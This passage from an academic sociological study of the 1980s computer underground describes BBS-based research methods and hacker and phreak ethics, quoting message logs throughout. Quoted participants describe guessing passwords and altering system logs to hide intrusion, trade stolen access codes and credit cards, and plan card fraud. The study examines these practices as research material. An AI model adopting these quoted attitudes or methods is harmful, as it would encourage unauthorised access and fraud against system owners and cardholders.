                 that let one "know where one is" (Latimer, 1984: 121).
             7.  A search for new ways  to make the unpresentable presenta-
                 ble, and break down the barriers that keep the profane out
                 of everyday life (Denzin, 1988: 471).
             8.  The introduction of new moves  into old games or inventing
                 new games  that are evaluated pragmatically  rather than
                 from some uniform stand point  of "truth" or philosophical
                 discourse (Callinicos, 1985: 86).
             9.  Emphasis on the  visual over the literary  (Lash,  1988:
                 314).
             10. Devaluation of formalism and  juxtaposition of signifiers
                 taken from the banalities of  everyday life (Lash,  1988:
                 314).
             11. Contesting of rationalist and/or  didactive views of cul-
                 ture (Lash, 1988: 314).
             12. Asking not what a cultural text  means,  but what it does
                 (Lash, 1988: 314).
             13. Operation through the spectator's immersion, the relative-
                 ly unmediated investment of his/her desire in the cultural
                 object (Lash, 1988: 314).
             14. Acknowledgement of the decenteredness  of modern life and
                 "plays with the apparent emptiness  of modern life as well
 
                                        - 8 -
 
 
                 as the lack of coherence  in modern symbol systems" (Man-
                 ning, 1989: 8).
               "Post-Modernism" in its positive  form constitutes an intel-
          lectual attack upon the atomized,   passive and indifferent mass
          culture which,  through the saturation of electronic technology,
          has reached its zenith in Post-War American (Newman,  1985:  5).
          It is this style of playful rebellion, irreverent subversion, and
          juxtaposition of fantasy with high-tech reality that impels us to
          interpret the computer underground as a postmodernist culture.
                                   Data and Method
               Obtaining data from any  underground culture requires tact.
          BBS operators protect  the privacy of users and  access to elite
          boards, or at least to their relevant security levels,  virtually
          always requires  completion of a preliminary  questionnaire,  a
          screening process, and occasional voice verification.   Research-
          ers generally do not themselves  violate laws or dominant norms,
          so they depend on their  informants for potentially "dirty infor-
          mation" (Thomas and Marquart, 1988).   Our own data are no excep-
          tion and derive from several sources.
               First,  the bulk  of our data come  from computer bulletin
          board systems.   BBSs are personal computers (PCs) that have been
          equipped with a  telephone modem and special  software that con-
          nects users to other PCs by  telephone.   After "logging in" by
          supplying a valid user name and  password,  the user can receive
          and leave messages to other users of the system.   These messages
          are rarely private and anyone calling the BBS can freely read and
 
                                        - 9 -
 
 
          respond to them.  There is usually the capacity to receive (down-
          load) or send (upload) text files ("G-philes")  or software pro-
          grams between the caller and host system.
               We logged the message section of CU BBSs to compile documen-
          tary evidence of  the issues deemed important  for discussion by
          participants.   Logs are "captured" (recorded using the computer
          buffer)  messages left on the board by users.   Calculating the
          quantity of logged data is  difficult because of formatting vari-
          ance,  but we estimate that our logs exceed 10,000 printed pages.
          The logs  cited here are verbatim  with the exception  of minor
          editing changes in format and extreme typographical errors.
               Identifying underground BBSs can be  difficult,  and to the
          uninitiated they may appear to be licit chat or shareware boards.
          For callers with sufficient access,  however,  there exist back-
          stage realms in  which "cracking" information is  exchanged and
          private text or  software files made available.    With current
          technology,  establishing a BBS  requires little initial skill.
          Most boards  are short-lived and  serve only local  or regional
          callers.   Because of the generally poor quality and amateur na-
          ture of these systems, we focused on national elite boards.   We
          considered a board "elite" if it met all of the following charac-
          teristics: At least one quarter of the users were registered out-
          side the state of the board  called;  the phone line were exclu-
          sively for  BBS use and  available 24  hours a day;   and the
          information and files/warez  were current "state of  the field."
          Elite CU members argue that there are less than ten "truly elite"
          p/hacker boards nationally.
                                       - 10 -
 
 
               We obtained the  names and numbers of BBSs  from the first
          boards we called, and used a snowball technique to supplement the
          list.   We obtained additional numbers from CU periodicals, and,
          as we became more familiar with the culture,  users also added to
          the list.   Our aggregate data include no less than 300 Bulletin
          board systems,  of which at least 50 attract phreaks and hackers,
          and voice or on-line interviews with  no less than 45 sysops (op-
          erators of BBS systems) and other active CU participants.
               A second data source included  open-ended voice and on-line
          interviews with hackers, phreaks and pirates.   The data include
          no less than 25 face-to-face, 25 telephone, and 60 on-line inter-
          views obtained as we became familiar with our informants.
               Third,  data acquisition included  as much participation as
          legally possible in CU activities[3].  This served to justify our
          presence in the culture and  provided information about the mun-
          dane activity of the CU.
               Finally,  we obtained back and current issues of the primary
          underground computerized magazines,  which are distributed on na-
          tional BBSs as text files.  These contain information relevant to
          the particular subculture,  and included PHRACK,  Activist Times
          Incorporated (ATI), P/Hun, 2600 Magazine, PIRATE, TAP, and Legion
          of Doom (LoD/H).   We also draw  data from national and interna-
          tional electronic mail (e-mail) systems on which an active infor-
          mation-sharing CU network has developed and spread.
               Assessing the validity and reliability  of data obtained in
          this manner creates special problems.   One is that of sampling.
          The number of boards,  their often ephemeral existence,  and the
                                       - 11 -
 
 
          problem of obtaining access all make conventional sampling impos-
          sible.   We focused on national boards and engaged in theoretical
          sampling (Glaser and Strauss, 1967: 45-77).  We consider our sam-
          ple representative, and accept Bordieu's observation that:
               If, following the canon dictated by orthodox methodolo-
               gy, you take a random sample, you mutilate the very ob-
               ject you have set out to construct.  If, in a study of
               the field of lawyers, for instance, you do not draw the
               President of the Supreme Court,  or if,  in an inquiry
               into the French intellectual field  of the 1950s,  you
               leave out Jean-Paul Sartre,  or Princeton University in
               a study of American academics, your field is destroyed,
               insofar as these personas or  institutions alone mark a
               crucial position--there are positions  in a field which
               command the whole structure  (Bordieu,  interviewed in
               Wacquant, 1989: 38).
               We judge our  sample of participants adequate  for several
          reasons.   First,  we presume that the members with whom we have
          had contact comprise the elite members of the culture,  as deter-
          mined by the nature of the  boards they were on,  references to
          them on national  boards,  the level of  expertise displayed in
          their messages, and their appearance in the "user lists" of elite
          boards.   We consider the BBSs to be "typical exemplars" because
          of their status in the culture, because of the level of sophisti-
          cation both of users and of message content,  and because of ref-
          erences to these boards as "elite" in CU periodicals.
                              The Computer Underground
               The computer underground is both a  life style and a social
          network.   As a lifestyle, it provides identity and roles, an op-
          erational ideology,  and guides daily routine.  As a social net-
          work,  it functions as a  communications channel between persons
          engaged in one of three basic activities:   Hacking,  phreaking,
 
                                       - 12 -
 
 
          and pirating[4].   Each subgroup possesses an explicit style that
          includes an ethic and "code  of honor," cohesive norms,  career
          paths,  and other characteristics that  typify a culture (Meyer,
          1989a, 1989b; Meyer and Thomas, 1989).
               Hebdige (1982:  113-117) used the concept of homology to de-
          scribe the structural unity that  binds participants and provides
          the "symbolic fit between the values  and life-styles of a group"
          and how it expresses or reinforces its focal concerns.   Homology
          refers to the affinity and similarities  members of a group share
          that give it the particular cultural identity.   These shared al-
          ternative values and actions connect CU members to each other and
          their culture,  and create a celebration of "otherness" from the
          broader culture.
          Hackers
                (Tune: "Put Another Nickel in")
                Put another password in,
                Bomb it out, and try again,
                Try to get past logging in,
                Were hacking, hacking, hacking.
                Try his first wife's maiden name,
                This is more than just a game,
                It's real fun, but just the same
                It's hacking, hacking, hacking.
                Sys-call, let's try sys-call.
                Remember, that great bug from Version 3,
                Of R S X, It's here!  Whoopee!
                Put another sys-call in,
                Run those passwords out and then,
                Dial back up, we're logging on,
                We're hacking, hacking, hacking.
                (The Hacker Anthem, by Chesire Catalyst)
               Hacking broadly refers to attempts to gain access to comput-
          ers to which one does not possess authorization.  The term "hack-
          ers" first came into use in the  early 1960's when it was applied
 
                                       - 13 -
 
 
          to a  group of pioneering  computer aficionados at  MIT (Levy,
          1984).   Through the 1970s,  a hacker was viewed as someone obs-
          essed with  understanding and mastering computer  systems (Levy
          1984). But, in the early 1980's, stimulated by the release of the
          movie "War Games"  and the much publicized arrest  of a "hacker
          gang" known as "The 414s",  hackers were seen as young whiz-kids
          capable of breaking into corporate  and government computer sys-
          tems (Landreth 1985:34).   The imprecise media definition and the
          lack of any clear understanding of what  it means to be a hacker
          results in the mis-application of the  label to all forms of com-
          puter malfeasance.
               Despite the inter-relationship between  phreaks and hackers,
          the label of "hacker" is generally  reserved for those engaged in
          computer system trespassing.   For CU participants,  hacking can
          mean either attempting to gain access  to a computer system,  or
          the more refined goals of exploring in,  experimenting with,  or
          testing a computer system.  In the first connotation, hacking re-
          quires skills to obtain valid  user accounts on computer systems
          that would otherwise be unavailable,   and the term connotes the
          repetitive nature of break-in attempts.  Once successful entry is
          made,  the illicit accounts are often shared among associates and
          described as being "freshly (or newly) hacked."
               The second  connotation refers  to someone  possessing the
          knowledge, ability,  and desire to fully explore a computer sys-
          tem.   For elite hackers,  the mere act of gaining entry is not
          enough to warrant the "hacker" label;  there must be a desire to
 
                                       - 14 -
 
 
          master and  skill to  use the  system after  access has  been
          achieved:
               It's Sunday night,  and I'm in  my room,  deep into a
               hack.   My eyes are on the monitor, and my hands are on
               the keyboard,  but my mind  is really on the operating
               system of a super-minicomputer a  thousand miles away -
               a super-mini with an operating systems that does a good
               job of tracking users, and that will show my activities
               in its user logs,  unless I  can outwit it in the few
               hours before  the Monday  morning staff  arrives for
               work.....Eighteen hours ago,  I managed to hack a pass-
               word for the PDP 11/44.  Now, I have only an hour or so
               left to alter the user logs.  If I don't the logs will
               lead the system operators to my secret account, and the
               hours of work  it took me to get this  account will be
               wasted (Landreth, 1985: 57-58).
               An elite hacker must experiment  with command structures and
          explore the many files available in  order to understand and ef-
          fectively use the  system.  This is sometimes  called "hacking
          around" or simply "hacking a system".  This distinction is neces-
          sary because not all trespassers are necessarily skilled at hack-
          ing out passwords,  and not all hackers retain interest in a sys-
          tem once  the challenge of  gaining entry has  been surmounted.
          Further, passwords and accounts are often traded,  allowing even
          an unskilled intruder to erroneously claim the title of "hacker."
               Our data indicate that, contrary to their media image, hack-
          ers avoid deliberately destroying data  or otherwise damaging the
          system.   Doing so would conflict with their instrumental goal of
          blending in with the average user  to conceal their presence and
          prevent the deletion of the account.   After spending what may be
          a substantial amount  of time obtaining a  high access  account,
          the hacker places a high priority  on not being discovered using
          it,  and hackers share considerable  contempt for media stories
 
                                       - 15 -
 
 
          that portray them  as "criminals."  The leading  CU periodicals
          (e.g., PHRACK, PIRATE)  and several CU "home boards" reprint and
          disseminate media stories, adding ironic commentary.  The percep-
          tion of media  distortion also provides grist  for message sec-
          tions:
               A1: I myself hate newspaper reporters who do stories on
               hackers, piraters, phreaks,  etc...because they always
               make us sound like these  incred.  {sic} smart people
               (which isn't too bad) who are the biggest threat to to-
               days community.  Shit...the  BEST hackers/phreaks/etc
               will tell you that they only  do it to gain information
               on those systems,  etc...(Freedom  - That's what they
               call it...right?)  (grin)
               A2: Good point...never met a "real p/h type yet who was
               into ripping off. To rip of a line from the Steve Good-
               man song (loosely),  the game's the thing.  Even those
               who allegedly fly the jolly rodger {pirates},  the true
               ones, don't do it for the rip-off, but,  like monopoly,
               to see if they can get Boardwalk and Park Place without
               losing any railroads.  Fun of the latter is to start on
               a board with a single good game or util {software util-
               ity} and see what it can be turned into,  so I'm told.
               Fuck the press (DS message log, 1989).
               One elite hacker,  a member of a loose-knit organization re-
          cently in the national news  when some participants were indicted
          for hacking,  responded to media distortions of the group by is-
          sueing an underground press release:
               My name is {deleted}, but to the computer world,  I am
               {deleted}.   I have been a member of the group known as
               Legion of Doom since its  creation,  and admittedly I
               have not been the most legitimate computer user around,
               but when people start hinting at my supposed Communist-
               backed actions,  and say that I am involved in a world-
               wide conspiracy to destroy the nation's computer and/or
               911 network,  I have to speak  up and hope that people
               will take what I have to say seriously. . . .
               People just can't seem to grasp  the fact that a group
               of 20 year old kids just  might know a little more than
               they do,  and rather than make  good use of us,  they
               would rather  just lock us  away and keep  on letting
               things pass by them.   I've said this before, you can't
                                       - 16 -
 
 
               stop burglars from robbing you when you leave the doors
               unlocked and merely bash them in the head with baseball
               bats when they walk in.   You  need to lock the door.
               But when you leave the doors open, but lock up the peo-
               ple who can  close them for you  another burglar will
               just walk right in ("EB," 1990).
               Although skirting the law, hackers possess an explicit ethic
          and their primary goal is  knowledge acquisition.   Levy (1984:
          26-36) identifies six "planks" of the original hacker ethic,  and
          these continue to guide modern hackers:
             1.  First,  access to computers should be unlimited and total:
                 "Always yield to the Hands-On Imperative!"
             2.  Second, all information should be free.
             3.  Third, mistrust authority and promote decentralization.
             4.  Fourth, hackers should be judged by their prowess as hack-
                 ers rather than by formal  organizational or other irrele-
                 vant criteria.
             5.  Fifth, one can create art and beauty on a computer.
             6.  Finally, computers can change lives for the better.
               PHRACK,  recognized as the  "official" p/hacker newsletter,
          expanded on this creed with a rationale that can be summarized in
          three principles ("Doctor Crash," 1986).   First, hackers reject
          the notion that "businesses" are the  only groups entitled to ac-
          cess and use of modern technology.   Second,  hacking is a major
          weapon in the fight against encroaching computer technology.  Fi-
          nally,  the high cost of equipment  is beyond the means of most
          hackers, which results in the perception that hacking and phreak-
          ing are the only recourse to  spreading computer literacy to the
          masses:
 
                                       - 17 -
 
 
               Hacking.  It is a full  time hobby,  taking countless
               hours per week to learn,  experiment,  and execute the
               art of penetrating multi-user computers:   Why do hack-
               ers spend a good portion of their time hacking?   Some
               might say it is scientific curiosity, others that it is
               for mental stimulation.   But the true roots of hacker
               motives run much deeper than that.  In this file I will
               describe the underlying motives  of the aware hackers,
               make known the connections between Hacking,  Phreaking,
               Carding, and Anarchy,  and make known the "techno-revo-
               lution" which  is laying seeds  in the mind  of every
               hacker.  . .  .If you need a tutorial on how to perform
               any of the above stated  methods {of hacking},  please
               read a {PHRACK} file on it.   And whatever you do, con-
               tinue the fight. Whether you know it or not, if you are
               a hacker, you are a revolutionary.  Don't worry, you're
               on the right side ("Doctor Crash," 1986).
               Computer software,  such as auto-dialers popularized in the
          film War Games,  provides a  means for inexperienced hackers to
          search out other computers.   Auto-dialers randomly dial numbers
          and save the "hits" for manual testing later.  Some users self-i-
          dentify has hackers simply on  the basis of successfully collect-
          ing computer numbers or passwords, but these users are considered
          "lamerz," because they do not possess sufficient knowledge to ob-
          tain access or move about in  the system once access is obtained.
          Lamerz are readily identified by their message content:
                 Sub ->numbers
                From -> (#538)
                To   ->all
                Date ->02/21/xx 06:10:00 PM
               Does anyone know any numbers for hotels, schools, busi-
               nesses,  etc..and passwords if you  do please leave a
               bulletin with the number and  the password and/or logon
               id.
                 Sub ->phun
                From -> (#138)
                To   ->all
                Date ->02/22/xx 12:21:00 AM
               Anyone out there  got some good 800 dial  up that are
               fairly safe to hack?  If so could ya leave me em in e-
                                       - 18 -
 
 
               mail or post em with  the formats.....any help would{be
               appreciated......
                                 thanx
                 Sub ->NUMBERS
                From -> (#538)
                To   ->ALL
                Date ->02/24/xx 03:12:00 PM
               Does anyone have any 1-800 numbers with id,  logon and
               passwords?
                 Sub ->Credit Card's for Codez
                From -> (#134)
                To   ->All
                Date ->01/26/xx 07:43:00 AM
               Tell ya what.   I will  exchange any amount of credit
               cards for a code or two.  You name the credit limit you
               want on the credit card and I will get it for you.   I
               do this cause I to janitorial  work at night INSIDE the
               bank when no one is there..... heheheheheh
                 Sub ->Codes..
                From -> (#660)
                To   ->All
                Date ->01/31/xx 01:29:00 AM
               Well,  instead of leaving codes,   could you leave us
               "uninformed" people with a few 800 dialups and formats?
               I don't need codes,  I just want dialups!   Is that so
               much to ask?   I would be willing to trade CC's {credit
               cards} for dialups.  Lemme know..
                 Sub ->0266 Codez
                From -> (#134)
                To   ->All
                Date ->01/31/xx 06:56:00 AM
               Anyone, What is the full dial up for 0266 codez?
               Such requests are considered amateurish, rarely generate the
          requested information,  and elicit  predictable "flamez" (severe
          criticism) or even potentially dangerous pseudo-assistance:
                 Sub ->Reply to: 0266 Codez
                From -> (#124)
                To   ->C-Poo
                Date ->01/31/xx 09:02:00 AM
 
                                       - 19 -
 
 
               Okay,   here's  the full  info,   Chris:    Dial
               1-900-(pause)-{xxx}-REAL.   When it  answers,   hit
               #*9876321233456534323545766764 Got it?   Okay, here's a
               800 number to try:  1-800-426-{xxxx}.   Give the opera-
               tor your zip,and fake it from there!   Enjoy, you hack-
               meister, you!
                Sub ->Reply to: 0266 Codez
                From -> (#448)
                To   -> #38
                Date ->01/31/xx 03:43:00 PM
               What the fuck kind of question  is that?  Are you that
               stupid?  what is the full dial up for an 0266?  Give me
               a break!  Call back when you learn not when you want to
               leech!
                 Sub ->CC-ING
                From -> (#393)
                To   -> #38
                Date ->02/05/xx 01:41:00 AM
               WHAT THE HELL ARE YOU?  PROBABLY A NARC, AREN'T YA!  NO
               ONE IN HIS RIGHT MIND ASKS FOR CARDS. (AND NARCS AREN'T
               IN THEIR RIGHT MINDS) AND GIVE OUT CARDS,  WHAT DO YOU
               THINK WE ARE, SHLONGS?!  PERSONALLY I GET MY OWN ON THE
               JOB,  PUMPING GAS  PAYS A  LOT MORE  THAN YOU THINK,
               THEREFORE I DON'T NEED ANY.  THINK ABOUT IT, IF YOU ARE
               A GOOD HACKER, WHICH I CAN SEE YOU'RE NOT, THEN YOU CAN
               HACK OUT YOUR OWN CODEZ.   PEOPLE WHO NEED CCS CAN CALL
               CC-VMBS.  I HAVE ONE,  BUT DON'T ASK FOR IT.   IF YOU
               DON'T KNOW  MY CC-VMB LINE  THEN YOU'RE NOT  TO WELL
               KNOWN.   A LOT OF KNOWN  HACKERS KNOW MY  CC-VMB LINE.
               WELL, IF YOU'RE A NARC, YOU'VE JUST BEEN FOUND OUT,  IF
               NOT YOU MIGHT WANT TO GET A JOB AS ONE CUZ YOU ACT JUST
               LIKE ONE {In BBS protocol,  upper case letters indicate
               emphasis, anger, or shouting}.
               Although hackers  freely acknowledge that  their activities
          may be occasionally illegal,  considerable emphasis is placed on
          limiting violations only to those  required to obtain access and
          learn a system,   and they display hostility  toward those who
          transgress beyond beyond these limits.   Most experienced CU mem-
          bers are suspicious of young novices who are often entranced with
          what they perceive to be the "romance" of hacking.  Elite hackers
 
                                       - 20 -
 
 
          complain continuously that  novices are at an  increased risk of
          apprehension and also can "trash"  accounts on which experienced
          hackers have gained and hidden their access.   Nonetheless,  ex-
          perienced hackers take pride in  their ethic of mentoring promis-
          ing newcomers, both through their BBSs and newsletters:
               As {my} reputation grew,  answering such requests [from
               novice hackers wanting help] became  a matter of pride.
               No matter how difficult the question happened to be,  I
               would sit at the terminal for five, ten,  twenty hours
               at a time, until I had the answer (Landreth, 1985: 16).
               The nation's top elite p/hacker  board was particularly nur-
          turing of promising novices before it voluntarily closed in early
          1990, and its sysop's handle means "teacher."  PHRACK,  begun in
          1985,  normally contained 10-12  educational articles (or "phi-
          les"),  most of which  provided explicit sophisticated technical
          information about computer networks  and telecommunications sys-
          tems[5].   Boundary  socialization occurs in message  bases and
          newsletters that  either discourage  such activity  or provide
          guidelines for concealing access once obtained:
               Welcome to the world of hacking!  We,  the people who
               live outside of the normal rules, and have been scorned
               and even arrested by those  from the 'civilized world',
               are becoming scarcer  every day.  This is  due to the
               greater fear of what a good hacker (skill wise, no mor-
               al judgements here) can do nowadays, thus causing anti-
               hacker sentiment in the masses.  Also, few hackers seem
               to actually know about the  computer systems they hack,
               or what equipment they will run  into on the front end,
               or what they  could do wrong on a system  to alert the
               'higher' authorities who monitor the system. This arti-
               cle is intended  to tell you about some  things not to
               do, even before you get on the system. We will tell you
               about the new wave of  front end security devices that
               are beginning to be used on computers.  We will attempt
               to instill in you a second identity,  to be brought up
               at time of  great need,  to pull you  out of trouble.
               (p/hacker newsletter, 1987).
 
                                       - 21 -
 
 
               Elite hacking requires highly sophisticated technical skills
          to enter the maze of protective barriers,  recognize the computer
          type, and move about at the highest system levels.   As a conse-
          quence, information sharing becomes the sine qua non of the hack-
          er culture.   "Main message" sections  are generally open to all
          users, but only general information, gossip,  and casual commen-
          tary is posted. Elite users, those with higher security privileg-
          es and access to the "backstage" regions,  share technical infor-
          mation and problems, of which the following is typical:
                   89Mar11
                   From ***** ** * ***>
               Help! Anyone familiar with a system that responds:
                 A2:       SELECT     :       DISPLAY:
               1=TRUNK,2=SXS;INPUT:3=TRUNK,4=SXS,5=DELETE;7=MSG  <and
               then it gives you a prompt>  If you chose 1...  ENTER
               OLD#,(R=RETURN)
                 At this point I know you can enter 7 digits,  the 8th
               will give you an INVALID ENTRY type message.  Some num-
               bers don't work however.  (1,2,7,8 I know will)
                 Anybody?
                   89Mar10
                   From *********>
               I was hacking around on telenet (415 area code) and got
               a few things that I am stuck-o on if ya can help,  I'd
               be greatly happy.   First of all,   I got  one that is
               called RCC PALO ALTO and I can't figure it out.  Second
               (and this looks pretty fun)  is the ESPRIT COMMAIL  and
               I know that a user name is  SYSTEM because it asked for
               a password on ONLY that account (pretty obvious eh?)  a
               few primnet and  geonet nodes and a  bunch of TELENET
               ASYYNC to 3270 SERVICE.   It asks for TERMINAL TYPE, my
               LU NUMBER and on numbers  higher  than 0 and lower that
               22 it asks for a password.  Is it an outdial?  What are
               some common passwords?  then I got a sushi-primnet sys-
               tem.  And a dELUT system.   And at 206174 there is JUST
               a :  prompt.  help!  (P/h message log, 1988).
               Rebelliousness also permeates the hacker  culture and is re-
          flected in actions, messages, and symbolic identities.  Like oth-
 
                                       - 22 -
 
 
          er CU participants, hackers employ handles (aliases)  intended to
          display an aspect of one's personality and interests,  and a han-
          dle can often reveal whether its  owner is a "lamer" (an incompe-
          tent)  or sophisticated.   Hackers take  pride in their assumed
          names, and one of the greatest taboos is to use the handle of an-
          other or to use multiple handles.  Handles are borrowed liberally
          from the anti-heros of science fiction,  adventure fantasy,  and
          heavy metal rock lyrics,  particularly among younger users,  and
          from word plays on technology, nihilism,  and violence.   The CU
          handle reflects a stylistic identity  heavily influenced by meta-
          phors reflecting color (especially red and black),  supernatural
          power (e.g., "Ultimate Warrior, "Dragon Lord"), and chaos ("Death
          Stalker," "Black Avenger"), or ironic twists on technology,  fan-
          tasy, or symbols of mass culture (e.g., Epeios,  Phelix the Hack,
          Ellis Dea, Rambo Pacifist, Hitch Hacker).
               This anti-establishment ethos also  provides an ideological
          unity for collective  action.   Hackers have been  known to use
          their collective skills in retaliation  for acts against the cul-
          ture that the perceive as unfair by, for example, changing credit
          data or "revoking" driver's licenses (Sandza, 1984b;  "Yes,  you
          Sound very Sexy," 1989).   Following a bust of a national hacker
          group, the message section of the "home board" contained a lively
          debate on the desireability of  a retaliatory response,  and the
          moderates prevailed.   Influenced especially by such science fan-
          tasy as William Gibson's Neuromancer (1984),  John Brunner's The
          Shockwave Rider (1975), and cyber-punk, which is a fusion of ele-
 
                                       - 23 -
 
 
          ments of electronic communication technology  and the "punk" sub-
          culture,  the hacker ethic promotes resistance to the very forms
          that create it.   Suggestive of Frazer's (1922) The Golden Bough,
          power is challenged and supplanted  by rituals combining both de-
          struction and rejuvenation.   From this emerges a shared ethos of
          opposition against perceived Orwellian  domination by an informa-
          tion-controlling elite:
               (Hackers will) always be necessary,  especially in the
               technological oppression of the future.   Just imagine
               an information system that  systematically filters out
               certain obscene words.   Then it will move on to phras-
               es,  and then entire ideas will be replaced by comput-
               ers!   Anyway, there will always be people tripping out
               on paper and trying to keep it to themselves,  and it's
               up to us to at least loosen their grasp (P.A.  Message
               Log 1988).
          Another hacker summarized the  near-anarchist ethic characterized
          the CU style:
               Lookit, we're here as criminal hobbyists, peeping toms,
               and looters.   I am in it for the fun.   Not providing
               the public what it has a right to know,  or keeping big
               brother in check.  I couldn't care less.   I am sick of
               the old journalistic hackers  nonsense about or (oops!
               OUR)  computerized ego...I make  no attempt to justify
               what I am doing.  Because it doesn't matter. As long as
               we live in this goddamn welfare  state I might as well
               have some fun taking what isn't mine,  and I am better
               off than  those welfare-assholes  who justify  their
               stealing.   At least I am smart enough to know that the
               free lunch  can't go on  forever (U.U.   message log
               1988).
               In sum, the hacker style reflects well-defined goals, commu-
          nication networks, values, and an ethos of resistance to authori-
          ty.  Because hacking requires a  broader range of knowledge than
          does phreaking,  and because such knowledge can be acquired only
          through experience, hackers tend to be both older and more knowl-
 
                                       - 24 -
 
 
          edgeable than phreaks.   In addition, despite some overlap,  the
          goals of the two are somewhat dissimilar.  As a consequence, each
          group constitutes a separate analytic category.
          Phreaks.
               Running numbers is not only fun;  it's a moral impera-
               tive!  (Phreak credo).
               Phreaking broadly refers  to the practice of  using either
          technology or telephone credit card numbers (called "codez")  to
          avoid long distance charges.  Phreaking attained public visibili-
          ty with the  revelation of the exploits of  John "Cap'n Crunch"
          Draper, the "father of phreaking" (Rosenbaum,  1971).   Although
          phreaking and hacking each require different skills,  phreaks and
          hackers tend to associate on same boards.   Unlike hackers,  who
          attempt to master a computer system  and its command and security
          structure,  phreaks struggle to  master telecom (tele-communica-
          tions) technology:
               The phone system is the most interesting,  fascinating
               thing that I know of. There is so much to know.   Even
               phreaks have their own areas of knowledge.  There is so
               much to know that one phreak could know something fair-
               ly important and the next phreak not.  The next phreak
               might know  10 things that  the first  phreak doesn't
               though.  It all  depends upon where and  how they get
               their info.  I myself would like to work for the telco,
               doing something interesting, like programming a switch.
               Something that isn't slave  labor bullshit.  Something
               that you enjoy, but have to take risks in order to par-
               ticipate unless you are lucky  enough to work for Bell/
               AT&T/any telco.  To have legal access to telco things,
               manuals, etc. would be great (message log, 1988).
               Early phreaking methods  involved electro-mechanical devices
          that generated key tones or altered  phone line voltages to trick
          the mechanical  switches of the  phone company  into connecting
 
                                       - 25 -
 
 
          calls without charging, but the advent of computerized telephone-
          switching systems largely made these devices obsolete.   In order
          to continue their practice,  phreaks  have had to learn hacking
          skills in order to obtain  access to telephone company computers
          and software.
               Access to telecom information takes several forms,  and the
          possesion of numbers for "loops" and  "bridges," while lying in a
          grey area of law, further enhances the reputation and status of a
          phreak.   P/hackers can utilize "loop lines" to limit the number
          of eavesdroppers on their conversations.  Unlike bridges,  which
          connect an unlimited number of callers simultaneously,  loops are
          limited to just two people at a time[6].  A "bridge" is a techni-
          cal name for what is commonly known  as a "chat line" or "confer-
          ence system." Bridges are familiar to the  public as the pay-per-
          minute  group conversation  systems advertised  on late  night
          television.   Many bridge systems are owned by large corporations
          that maintain them for business use  during the day.   While the
          numbers to these systems are not public knowledge,  many of them
          have been discovered by phreaks who  then utilize the systems at
          night.   Phreaks are skilled at  arranging for a temporary, pri-
          vate bridge to  be created via ATT's  conference calling facili-
          ties.   This  provides a helpful information  sharing technique
          among a self-selected group of phreak/hackers:
               Bridges can be extremely  useful means of distributing
               information as long as the {phone} number is not known,
               and you don't have a  bunch of children online testing
               out their DTMF.   The last great discussion I partici-
               pated with over a bridge occurred about 2 months ago on
               an AT&T  Quorum where all  we did was  engineer 3/way
               {calls} and restrict ourselves  to purely technical in-
                                       - 26 -
 
 
               formation. We could have convinced the Quorum operators
               that we were  AT&T technicians had the  need occurred.
               Don't let the kids ruin all  the fun and convenience of
               bridges.   Lameness is one thing,  practicality is an-
               other (DC, message log, 1988).
               Phreaks recognize their precarious legal position,  but see
          no other way to "play the game:"
               Phreaking involves  having the  dedication to  commit
               yourself to learning  as much about the  phone system/
               network as possible.  Since most of this information is
               not made public,   phreaks have to resort  to legally
               questionable means  to obtain the knowledge  they want
               (TP2, message log, 1988).
               Little sympathy exists among experienced phreaks for "teleco
          ripoff."  "Carding," or the use  of fraudulent credit cards,  is
          anathema to phreaks,  and not only violates the phreaking ethic,
          but is simply not the goal of phreaking:
               Credit card  fraud truly gives  hacking a  bad name.
               Snooping  around a  VAX is  just electronic  voyeu-
               rism. . .carding a new modem is just flat out blue-col-
               lar crime.   It's just as bad as breaking into a house
               or kicking a puppy!   {This phreak} does everything he
               can (even up to turning off a number) to get credit in-
               formation taken off a BBS.  {This phreak} also tries to
               remove codes from BBSes.   He doesn't see code abuse in
               the same light as credit card fraud,  (although the law
               does),  but posted codes are  the quickest way to get
               your board busted, and your computer confiscated.  Peo-
               ple should just find a  local outdial to wherever they
               want to call  and use that.   If you  only make local
               calls from an outdial, it will never die, you will keep
               out of trouble,  and everyone  will be happy (PHRACK,
               3(28): Phile 2).
               Experienced phreaks  become easily angered at  novices and
          "lamerz" who engage in fraud or are interested only in "leeching"
          (obtaining something for nothing):
                Sub ->Carding
                From ->JB (#208)
                To   ->ALL
                Date ->02/10/xx 02:22:00 PM
 
                                       - 27 -
 
 
               What do you  people think about using  a parents card
               number for carding?   For instance,  if I had a friend
               order and receive via next day  air on my parents card,
               and receive it at my parents house while we were on va-
               cation.  Do you think that would work?   Cuz then, all
               that we have to do is to leave the note,  and have the
               bud pick up the packages,  and  when the bill came for
               over $1500, then we just say... 'Fuck you!   We were on
               vacation!   Look at  our airline tickets!' I  hope it
               does... Its such a great plan!
                Sub ->Reply to: Carding
                From -> (xxx)
                To   -> X
                Date ->02/11xx 03: 16:00 AM
               NO IT'S  NOT A GREAT  IDEA!   WHERE'S YOUR  SENSE OF
               RESPONSIBILITY TO  YOUR FAMILY?    ARE THEY  ALL IN
               AGREEMENT WITH YOU?   WOULD YOU WANT ANYONE TO USE YOUR
               PRIVATE STUFF  IN ILLEGAL (AND  IMMORAL)  ACTIVITIES
               WITHOUT YOUR KNOWLEDGE?   DIDJA  EVER HEAR ABOUT TRUST
               BETWEEN FAMILY MEMBERS?   IF YOU'RE GOING TO BE A THIEF
               (AND THAT'S NOT  NEAT LIKE JAMES BOND  IN THE MOVIES),
               TAKE THE RISKS ONLY UPON YOURSELF!
                Sub ->Carding
                From -> (#208)
                To   -> (#47)
                Date ->02/12/xx 11: 18:00 AM
               Why not?   We  have a law that says that  we have the
               right to refuse  payment to credit cards  if there are
               fraudulent charges.   All we do  and it is settled....
               what is so bad about it?  I'm going for it!
                 Sub ->Reply to: Carding
                From -> (xxx)
                To   ->J.B.
                Date ->02/13/xx 02:08:00 AM
               APPARENTLY YOU MISSED THE MAIN  POINTS I TRIED TO MAKE
               TO YOU . . .   YOU'RE  A THIEF AND A  LIAR,  AND ARE
               BETRAYING THE TRUST OF YOUR FAMILY AS WELL AS INVOLVING
               THEM IN YOUR RISK WITHOUT THEIR KNOWLEDGE.   THAT MEANS
               YOU ARE A  FAIRLY SCUMMY INDIVIDUAL IF  YOU GO THROUGH
               WITH IT!   NOW AS TO YOUR "DEFENCE" ABOUT $50 MAXIMUMS
               AND ERRONEOUS BILLINGS..  LAW MAKES A CLEAR DISTINCTION
               ABOUT THEFT BY  FRAUD (OF WHICH YOU  WOULD BE GUILTY).
               AND IN A LARGER SENSE,  YOUR  THEFT JUST MAKES IT MORE
